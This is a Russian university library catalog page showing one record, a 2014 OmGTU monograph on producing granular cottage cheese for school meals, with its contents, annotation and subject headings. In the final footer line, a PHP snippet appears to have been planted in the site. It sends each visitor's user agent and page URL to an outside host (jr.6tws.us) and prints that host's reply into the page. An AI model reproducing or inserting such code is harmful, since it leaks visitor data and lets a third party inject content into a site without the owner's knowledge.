Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

48 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Шифр документа=C4F42B35-55CC-59D5-F1EE-AAABED7EBF61$")И(("Ключевые слова=БИОПРОДУКТЫ"))
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 1
1. 
C4F42B35-55CC-59D5-F1EE-AAABED7EBF61
C4F42B35-55CC-59D5-F1EE-AAABED7EBF61
63/А86
Артюхова, Светлана Ивановна.
Биотехнология производства зерненого творога для школьного питания [Текст] / С. И. Артюхова, И. Ф. Тетюшева ; ОмГТУ. - Омск : Изд-во ОмГТУ, 2014. - 115 с. : рис., табл. - Библиогр.: с. 88-113. - ISBN 978-5-8149-1937-3 : 182.00 р.
Содержание:
Введение. - С. 3
Раздел 1. Анализ состояния проблемы. - С. 5
1.1. Медико-биологические аспекты создания антистрессового молочного биопродукта для школьников подросткового возраста. - С. 5
1.2. Основные направления в развитии технологии производства функциональных продуктов для школьного питания. - С. 13
1.3. Роль пробиотических микроорганизмов для здоровья человека. - С. 19
1.4. Пропионовокислые бактерии, как фактор профилактики заболеваний нервной системы. - С. 22
1.5. Значение йода и селена для здоровья человека. - С. 27
1.6. Информированность школьников г. Омска о роли функциональных продуктов питания. - С. 33
1.7. Особенности технологии зерненого творога. - С. 35
Раздел 2. Разработка биотехнологии производства зерненого творога для школьного питания. - С. 43
2.1. Обоснование выбора заквасочных культур для производства зерненого творога. - С. 43
2.2. исследование биотехнологических свойств молочного сгустка и творожного зерна, полученных с использованием БК-Т. - С. 47
2.3. Обоснование выбора заквасочной микрофлоры для ферментации сливок. - С. 52
2.4. Обоснование выбора биологически активной добавки "Селенпропионикс" для ферментации сливок. - С. 57
2.5. Изучение влияния соли морской йодированной на органолептические показатели зерненого творога. - С. 60
2.6. Разработка технологии производства зерненого творога. - С. 61
Раздел 3. Изучение качественных показателей разных видов зерненого творога и обоснование их сроков хранения. - С. 71
3.1. Изучение качественных показателей свежевыработанного зерненого творога и в процессе хранения. - С. 71
3.2. Изучение энергетической и пищевой ценности зерненого творога. - С. 78
3.3. Изучение биологической ценности зерненого творога. - С. 81
3.4. Результаты производственной апробации, разработка и утверждение НТД на новые биопродукты. - С. 85
Заключение. - С. 86
Библиографический список. - С. 88
УДК 637.146.3(075) + 637.3(075) + 606(075)

Рубрики:
Биопродукты -- Биотехнологии -- Учебники и пособия
Биотехнологии -- УЧЕБНИКИ И ПОСОБИЯ
28с (Химическая технология и биотехнология)
Химическая технология и биотехнология
Учебники и пособия -- Очное обучение

Кл.слова (ненормированные): ОМПИ -- ОМГТУ -- МОНОГРАФИЯ -- УЧЕБНИК И ПОСОБИЕ
Аннотация: Представлены данные по производству функциональных продуктов на молочной основе для школьного питания. Приведены результаты собственных теоретических и экспериментальных исследований в сфере совершенствования технологии производства зерненого творога для школьного питания.
Рекомендуется специалистам в области биотехнологии и пищевой промышленности, а также студентам бакалавриата, магистратуры, аспирантам, специализирующимся по соответствующим направлениям.
Доп. точки доступа:
Тетюшева, Ирина Федоровна
Омский государственный технический университет (Омск)

Нет сведений об экземплярах
Держатели документа:
Омский государственный технический университет : Россия, 644050, г. Омск, проспект Мира, 11
Оглавление 
Держатели документа (Информация об экземплярах) 

Представлены данные по производству функциональных продуктов на молочной основе для школьного питания. Приведены результаты собственных теоретических и экспериментальных исследований в сфере совершенствования технологии производства зерненого творога для школьного питания.

Рекомендуется специалистам в области биотехнологии и пищевой промышленности, а также студентам бакалавриата, магистратуры, аспирантам, специализирующимся по соответствующим направлениям.

Полный текст


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 2992 - 19.08.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 1.11 с.14 запросов, 0.98c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;